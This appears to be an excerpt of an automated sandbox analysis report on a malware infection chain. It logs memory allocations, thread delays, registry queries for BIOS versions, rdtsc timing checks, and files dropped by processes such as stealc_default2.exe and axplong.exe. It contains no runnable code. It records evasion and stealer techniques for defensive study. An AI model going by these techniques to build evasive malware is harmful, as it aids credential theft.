Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Memory allocated: 25C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory allocated: 980000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory allocated: 2560000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory allocated: 2290000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory allocated: 4AA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory allocated: 5AA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory allocated: 5BD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory allocated: 6BD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory allocated: DF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory allocated: 2B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory allocated: 1060000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: E50000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2870000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 25D0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_052A03DF rdtsc

0_2_052A03DF

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598756
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598602
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598038
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 597461
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 597334
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 596141
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 595685
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 594359
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 593547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 593281
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 593062
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 592719
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 592344
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 592016
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 591797
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 591578
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 590807
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 590547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 590234
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 589969
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 589750
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 589516
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 589265
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 589031
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 588687
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 588266
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 587953
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 587719
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 587422
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 587203
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 586937
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 586687
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 585922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 585672
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 585406
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 585094
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 584812
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 584547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 584266
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 584016
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 583750
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 583516
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 583266
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 583047
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 582812
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 582516
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 582297
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 582094
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 581781
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 581484
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 581172
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 580875
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 580641
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 580328
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 580141
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 579922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 579715
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 579453
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 579234
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 578984
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 578766
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 578516
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 578312
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 578031
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 577828
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 577609
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 577375
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 577141
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 576913
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 576687
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 576484
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 576234
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 576000
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 575797
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 575547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 575312
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 575093
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 574797
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 574594
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 574312
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 574078
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 573844
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 573547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 572797
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 572547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 572328
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 572141
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 571922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 571672
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 571469
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 571203
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 570922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 570109
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 569875
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 569625
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 569328
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 569094
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 568948
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 568774
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 568531
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 568328
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 568094
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 567344
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 567141
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 566955
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 566750
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 566531
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 566344
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 566156
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 565922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 565703
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 565496
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 565291
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 564562
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 564342
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 564094
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 563844
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 563641
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 563500
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 563281
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 563047
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 562844
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 562680
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 562491
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 562281
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 562078
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 561844
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 561562
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 561391
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 561203
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 561016
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 560812
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 560623
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 560391
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 559687
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 559500
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 559312
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 559060
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 558828
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 558625
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 558451
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 558203
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 557982
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 557750
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 557047
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 556687
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 556481
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 556312
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 556139
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 555966
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 555777
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 555547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 555297
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 555109
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 554906
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 554641
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 554078
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 553859
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 553625
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 553422
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 553234
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 553047
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 552859
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 552672
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 552468
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 552266
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 552047
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 551797
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 551266
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 968	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1027	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 924	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 988	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 920	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1066	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 4101	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Window / User API: threadDelayed 1389
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Window / User API: threadDelayed 3211
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Window / User API: threadDelayed 9495
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Window / User API: threadDelayed 791
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1345
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1101

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wZcULqdrBkDQvQgfGRYD.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\rstxdhuj[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Blenar[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\5[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000321001\2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ed86be077bb_12[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\newbundle2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000343001\5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5712	Thread sleep count: 968 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5712	Thread sleep time: -1936968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5624	Thread sleep count: 1002 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5624	Thread sleep time: -2005002s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7736	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1948	Thread sleep count: 223 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1948	Thread sleep time: -6690000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7344	Thread sleep count: 640 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7344	Thread sleep time: -1280640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6048	Thread sleep count: 1027 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6048	Thread sleep time: -2055027s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7500	Thread sleep count: 924 > 30	Jump to behavior
